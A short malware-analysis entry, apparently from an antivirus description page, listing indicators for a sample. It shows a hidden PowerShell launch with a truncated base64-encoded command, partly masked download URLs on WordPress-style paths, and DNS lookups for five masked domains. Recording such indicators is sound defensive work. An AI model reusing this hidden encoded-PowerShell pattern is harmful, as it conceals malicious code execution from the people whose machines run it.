Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABBAHkAYwBiAHUAbQBpAGMAcQBoAD0AJwBEAHEAZwB0AHIAbQBxAHMAJwA7ACQATQBkAHcAZgBmAHAAZQBkAHoAIAA9ACAAJwA3ADMAOQAnADsAJABQAHEAbwB3AHEAawBwAHMAeABnAGkAeQB1AD0AJwBYAG8...
- 'ic#####cketainment.com':443
- http://me####angpagi.com/wp-admin/vyb/
- http://www.sh####travels.com/vvufz/wzr6/
- DNS ASK me####angpagi.com
- DNS ASK sh####travels.com
- DNS ASK su###saroma.net
- DNS ASK cs####curezza.com
- DNS ASK ic#####cketainment.com